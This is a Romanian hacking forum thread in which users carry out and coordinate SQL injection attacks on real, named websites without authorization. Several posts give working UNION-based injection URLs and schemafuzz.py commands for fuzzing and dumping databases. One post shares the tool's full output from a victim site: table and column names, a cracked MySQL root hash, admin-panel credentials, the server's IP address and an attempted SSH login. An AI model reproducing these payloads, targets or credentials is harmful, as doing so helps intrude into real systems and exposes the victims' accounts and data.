Jump to content
Flubber

SQL Injection

Recommended Posts

Posted

Salut baieti,

am incercat SQL Injection in: http://proiecte.nipne.ro/ am aflat ca foloseste versiunea 4 ( http://proiecte.nipne.ro/pn2/index_en.php?id=1+AND+1=0+UNION+SELECT+ALL+concat_ws(0x3a,version(),user(),database())-- ) si am ajuns la stadiul unde trebuie sa ghicesc numele tabelului ( http://proiecte.nipne.ro/pn2/index_en.php?id=-1+UNION+SELECT+ALL+group_concat(schema_name)+from+information_schema.schemata-- ) ...

putin ajutor?

P.S.: daca nu am postat unde trebuia, rog un moderator/administrator sa imi mute post-ul si topic-ul, multumesc

Posted
daca e versiunea 4 nu ai ce sa ii faci decat sa ghicesti tabelele ......e mai greu

pe asta l-am luat si eu acum cateva zile si i-am dat pace cand am vazut ca are versiunea 4

am inteles, ms pentru ajutor

Guest Praetorian
Posted

Da...daca era altu, .com, .net mai ziceam... =))

Dar daca este .ro, sa ajutam :))

Guest Praetorian
Posted

Ma tu crezi ca daca folosesti scripturi, programe rezolvi ceva?

Mai bine ai incerca sa faci tu cu mintea ta.. fara ajutorul nici unui program..

Posted
Ma tu crezi ca daca folosesti scripturi, programe rezolvi ceva?

Mai bine ai incerca sa faci tu cu mintea ta.. fara ajutorul nici unui program..

aha, ms oricum, voi incerca si varianta asta

Posted
http://www.darkc0de.com/others/schemafuzz.py

python schemafuzz.py --fuzz -u "http://www.site.com/index.php?id=1"

dupa ce iti gaseste:

python schemafuzz.py --dump -u "http://www.site.com/index.php?id=1" -D database -T table -C column1,column2...column999

omu vad ca stie sa faca interogari si din browser. hai sa ne cacam in sus ca vezi doamne scripturile sunt naspa...te indobitocesc...my ass

super, multumesc mult, in sfarsit ceea ce asteptam desi TinKode are dreptate (stie el ce zice)

Guest Praetorian
Posted

Ma Caracal, nu am zis ca scripturile sunt naspa...

Dar care mai este farmecul, cand tu doar bagi in cmd niste cuvinte si iti face toata treaba...

Una e cand dai scan dupa ele, apoi le faci cu diferite scripturi, decat cand cauti singur sa vezi daca e vulnerabil, si sa faci TU injectia manual.

Guest Praetorian
Posted

Daca ai multe hash-uri md5 si chiar vrei sa le decryptezi bagati in comp rainbow tables.

Posted

http://www.aries.ro - vulnerabil

[+] URL:http://www.aries.ro/index.php?lang_id=2+AND+1=2+UNION+SELECT+darkc0de--

[+] Evasion Used: "+" "--"

[+] 02:20:54

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: aries_site

User: root@localhost

Version: 5.0.67

[+] Number of tables names to be fuzzed: 347

[+] Number of column names to be fuzzed: 277

[+] Searching for tables and columns...

[+] Found a table called: admin

[+] Now searching for columns inside table "admin"

[!] Found a column called:user

[!] Found a column called:pass

[!] Found a column called:id

[-] Done searching inside table "admin" for columns!

[+] Found a table called: company

[+] Now searching for columns inside table "company"

[!] Found a column called:id

[!] Found a column called:login

[-] Done searching inside table "company" for columns!

[+] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table "mysql.user" for columns!

[+] Found a table called: news

[+] Now searching for columns inside table "news"

[!] Found a column called:id

[-] Done searching inside table "news" for columns!

[+] Found a table called: users

[+] Now searching for columns inside table "users"

[!] Found a column called:password

[!] Found a column called:id

[!] Found a column called:email

[!] Found a column called:login

[-] Done searching inside table "users" for columns!

[-] [02:36:10]

[-] Total URL Requests 1733

[-] Done

am obtinut:

user,pass din mysql.user

root:3c8c1a8e271e4bad (MySQL Hash) ---> root:toor

inca ceva: www.aries.ro/admin (user,id,pass din admin -> user: admin ; id: admin ; pass: 1)

am mai descoperit ca te poti conecta la aries.ro (prin DNS ip-ul este: 194.102.253.145) prin SSH 22, am incercat user-ul root, pass toor (din decriptarea hash-ului de mai sus) dar nu a mers.... acum am o nelamurire, toate userele astea unde le pot folosi? (nici la /admin nu au mers)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...